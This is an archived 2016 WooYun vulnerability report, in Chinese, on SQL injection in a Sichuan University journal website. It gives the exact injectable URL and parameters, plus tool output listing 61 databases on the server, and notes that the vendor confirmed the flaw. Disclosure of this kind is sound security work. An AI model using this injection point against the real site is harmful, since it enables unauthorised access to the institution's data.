漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0171382
漏洞标题:四川大学某站存在sql注入
相关厂商:四川大学信息管理中心
漏洞作者: 冰@封
提交时间:2016-01-20 16:43
修复时间:2016-03-05 09:52
公开时间:2016-03-05 09:52
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-22: 厂商已经确认,细节仅向厂商公开
2016-02-01: 细节向核心白帽子及相关领域专家公开
2016-02-11: 细节向普通白帽子公开
2016-02-21: 细节向实习白帽子公开
2016-03-05: 细节向公众公开
简要描述:
sql注入 。。 过滤吧
详细说明:
注入点:
http://science.ijournals.cn/jsunature_cn/ch/common_item.aspx?is_three_menu=0&line_num=16&parent_id=20061209112853001&menu_id=20061209122600001
漏洞证明:
available databases [61]
[*] ahyx_journal
[*] ahyx_main
[*] ahyx_website
[*] ahyy_journal
[*] ahyy_main
[*] ahyy_website
[*] aimspress_main
[*] EditorOnline
[*] gdnykx_journal
[*] gdnykx_main
[*] gdnykx_website
[*] jamp_journal
[*] jamp_main
[*] jsjclykz_journal
[*] jsjclykz_main
[*] jsjclykz_website
[*] jsuese_main
[*] jsunature_cn_journal
[*] jsunature_en_journal
[*] jsunature_main
[*] lykxyj_journal
[*] lykxyj_main
[*] lykxyj_website
[*] master
[*] model
[*] modernradar_journal
[*] modernradar_main
[*] modernradar_website
[*] modernradaren_websit
[*] msdb
[*] scxuebao_journal
[*] scxuebao_main
[*] scxuebaoen_journal
[*] sdqx_journal
[*] sdqx_main
[*] sdqx_website
[*] tempdb
[*] tyjx_journal
[*] tyjx_journal_archive
[*] tyjx_main
[*] tyjx_main_archive
[*] wbxb_journal
[*] wbxb_main
[*] wbxb_website
[*] wdzx_journal
[*] wdzx_main
[*] wdzx_website
[*] zgjzjszz_en_website
[*] zgjzjszz_journal
[*] zgjzjszz_main
[*] zgjzjszz_website
[*] zgwstx_journal
[*] zgwstx_main
[*] zgwstx_website
[*] zhkj_journal
[*] zhkj_main
[*] zhkj_website
[*] zhkjen_website
[*] zhonggsyzz_journal
[*] zhonggsyzz_main
[*] zhonggsyzz_website
修复方案:
过滤。。。。
版权声明:转载请注明来源 冰@封@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2016-01-22 09:14
厂商回复:
感谢可爱的白帽子,已转告相关部门
最新状态:
暂无